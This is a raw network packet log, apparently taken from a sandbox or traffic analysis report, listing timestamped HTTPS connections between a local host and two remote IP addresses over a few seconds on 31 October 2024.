                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.290551901 CET4435135413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.290626049 CET51354443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.290726900 CET51354443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.290740967 CET4435135413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.291949034 CET4435135113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.292263985 CET51351443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.292279959 CET4435135113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.292687893 CET51351443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.292695045 CET4435135113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.422688961 CET4435135013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.422764063 CET4435135013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.422874928 CET51350443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.422890902 CET4435135013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.422955990 CET51350443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.423229933 CET51350443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.423245907 CET4435135013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.423255920 CET51350443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.423260927 CET4435135013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.426724911 CET51355443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.426742077 CET4435135513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.426842928 CET51355443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.427045107 CET51355443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.427059889 CET4435135513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.488379002 CET51356443192.168.2.4142.250.185.228
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.488411903 CET44351356142.250.185.228192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.488487959 CET51356443192.168.2.4142.250.185.228
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.488784075 CET51356443192.168.2.4142.250.185.228
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.488797903 CET44351356142.250.185.228192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.540669918 CET4435135113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.540893078 CET4435135113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.540962934 CET51351443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.541023970 CET51351443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.541044950 CET4435135113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.541055918 CET51351443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.541063070 CET4435135113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.544300079 CET51357443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.544337034 CET4435135713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.544434071 CET51357443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.544611931 CET51357443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.544624090 CET4435135713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.294953108 CET4435135213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.295248032 CET4435135413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.295321941 CET4435135313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.295551062 CET51352443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.295578003 CET4435135213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.296055079 CET51352443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.296061039 CET4435135213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.296292067 CET51354443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.296299934 CET4435135413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.296663046 CET51354443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.296668053 CET4435135413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.296828032 CET51353443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.296837091 CET4435135313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.297167063 CET51353443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.297171116 CET4435135313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.339596987 CET44351356142.250.185.228192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.374265909 CET51356443192.168.2.4142.250.185.228
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.374305010 CET44351356142.250.185.228192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.374916077 CET44351356142.250.185.228192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.375226021 CET51356443192.168.2.4142.250.185.228
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.375299931 CET44351356142.250.185.228192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.416445017 CET51356443192.168.2.4142.250.185.228
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.421837091 CET4435135713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.423074961 CET4435135513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.424587965 CET4435135213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.424666882 CET4435135213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.424747944 CET51352443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.426326990 CET4435135413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.426351070 CET4435135413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.426392078 CET4435135413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.426429033 CET51354443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.426467896 CET51354443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.429622889 CET4435135313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.429697037 CET4435135313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.429749012 CET51353443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.469701052 CET51357443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.469716072 CET4435135713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.469746113 CET51355443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.470244884 CET51357443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.470248938 CET4435135713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.470422029 CET51353443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.470438957 CET4435135313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.470465899 CET51353443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.470470905 CET4435135313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.515080929 CET51355443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.515090942 CET4435135513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.515609980 CET51355443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.515614986 CET4435135513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.515816927 CET51352443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.515816927 CET51352443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.515847921 CET4435135213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.515857935 CET4435135213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.516880989 CET51354443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.516885996 CET4435135413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.526017904 CET51358443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.526056051 CET4435135813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.526124954 CET51358443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.526261091 CET51358443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.526269913 CET4435135813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.527210951 CET51359443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.527232885 CET4435135913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.527286053 CET51359443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.527892113 CET51360443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.527930021 CET4435136013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.527996063 CET51360443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.528110027 CET51360443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.528125048 CET4435136013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.528198004 CET51359443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.528208017 CET4435135913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.595963001 CET4435135713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.596035004 CET4435135713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.596179008 CET51357443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.643589973 CET4435135513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.643721104 CET4435135513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.643913984 CET51355443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.757332087 CET51357443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.757343054 CET4435135713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.757379055 CET51357443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.757384062 CET4435135713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.758441925 CET51355443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.758451939 CET4435135513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.758465052 CET51355443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.758470058 CET4435135513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.761811972 CET51361443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.761837959 CET4435136113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.761953115 CET51361443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.762670040 CET51362443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.762713909 CET4435136213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.762803078 CET51362443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.762836933 CET51361443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.762857914 CET4435136113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.762927055 CET51362443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:22.762934923 CET4435136213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.264177084 CET4435135913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.264722109 CET51359443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.264751911 CET4435135913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.265208006 CET51359443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.265213013 CET4435135913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.267463923 CET4435135813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.267894983 CET51358443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.267914057 CET4435135813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.268307924 CET51358443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.268316984 CET4435135813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.274610043 CET4435136013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.274950981 CET51360443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.274966955 CET4435136013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.275331020 CET51360443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.275336027 CET4435136013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.395899057 CET4435135913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.395986080 CET4435135913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.396043062 CET51359443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.396291971 CET51359443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.396316051 CET4435135913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.396339893 CET51359443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.396348000 CET4435135913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.399528027 CET4435135813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.399568081 CET4435135813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.399614096 CET51358443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.399630070 CET4435135813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.399674892 CET51358443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.400988102 CET51363443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.401041031 CET4435136313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.401060104 CET51358443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.401077986 CET4435135813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.401088953 CET51358443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.401096106 CET4435135813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.401222944 CET51363443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.402987003 CET51363443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.403004885 CET4435136313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.404643059 CET51364443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.404685974 CET4435136413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.404884100 CET51364443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.404969931 CET51364443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.404983997 CET4435136413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.408575058 CET4435136013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.408655882 CET4435136013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.408721924 CET51360443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.411144018 CET51360443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.411159992 CET4435136013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.411199093 CET51360443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.411204100 CET4435136013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.413943052 CET51365443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.413966894 CET4435136513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.414035082 CET51365443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.414218903 CET51365443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.414227009 CET4435136513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.495562077 CET4435136113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.496146917 CET51361443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.496162891 CET4435136113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.496748924 CET51361443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.496753931 CET4435136113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.506011009 CET4435136213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.506402969 CET51362443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.506422043 CET4435136213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.506830931 CET51362443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.506836891 CET4435136213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.624264002 CET4435136113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.624294043 CET4435136113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.624341965 CET4435136113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.624481916 CET51361443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.624886990 CET51361443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.624886990 CET51361443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.624913931 CET4435136113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.624923944 CET4435136113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.629875898 CET51366443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.629914999 CET4435136613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.630011082 CET51366443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.630199909 CET51366443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.630213976 CET4435136613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.638468027 CET4435136213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.638535023 CET4435136213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.638606071 CET51362443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.638789892 CET51362443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.638789892 CET51362443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.638806105 CET4435136213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.638817072 CET4435136213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.642519951 CET51367443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.642554998 CET4435136713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.642649889 CET51367443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.643255949 CET51367443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:23.643270969 CET4435136713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.132744074 CET4435136413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.142208099 CET51364443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.142241955 CET4435136413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.142724991 CET51364443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.142735004 CET4435136413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.142870903 CET4435136513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.144330025 CET51365443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.144362926 CET4435136513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.144797087 CET51365443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.144804001 CET4435136513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.149168968 CET4435136313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.149657011 CET51363443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.149674892 CET4435136313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.150115967 CET51363443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.150120974 CET4435136313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.266344070 CET4435136413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.266443014 CET4435136413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.266508102 CET51364443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.266721010 CET51364443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.266721010 CET51364443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.266743898 CET4435136413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.266755104 CET4435136413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.270343065 CET51368443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.270385027 CET4435136813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.270688057 CET51368443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.270891905 CET51368443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.270906925 CET4435136813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.272766113 CET4435136513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.272830009 CET4435136513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.272872925 CET4435136513.107.246.45192.168.2.4
